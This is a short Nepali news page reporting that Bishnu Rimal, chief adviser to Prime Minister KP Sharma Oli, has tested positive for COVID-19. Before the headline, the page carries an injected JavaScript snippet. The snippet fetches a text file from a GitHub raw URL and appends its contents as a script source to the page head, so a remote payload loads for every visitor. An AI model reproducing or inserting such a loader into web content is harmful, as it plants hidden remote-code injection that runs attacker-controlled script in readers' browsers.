;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); प्रधानमन्त्री ओलीका मुख्य सल्लाहकार रिमाललाई कोरोना पुष्टि – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • प्रधानमन्त्री ओलीका मुख्य सल्लाहकार रिमाललाई कोरोना पुष्टि
समाचार

प्रधानमन्त्री ओलीका मुख्य सल्लाहकार रिमाललाई कोरोना पुष्टि

असोज १७,
काठमाण्डाै । प्रधानमन्त्री केपी शर्मा ओलीका मुख्य सल्लाहकार विष्णु रिमाललाई कोरोना सङ्क्रमण पुष्टि भएको छ ।

रिमालले ट्वीटरमार्फत आफूलाई कोरोना सङ्क्रमण देखिएको जानकारी दिए । उनले आफूसँग सम्पर्कमा आएका सबैलाई स्वास्थ्यको ख्याल गर्न पनि आग्रह गरेका छन् ।

फेसबुक प्रतिक्रियाहरु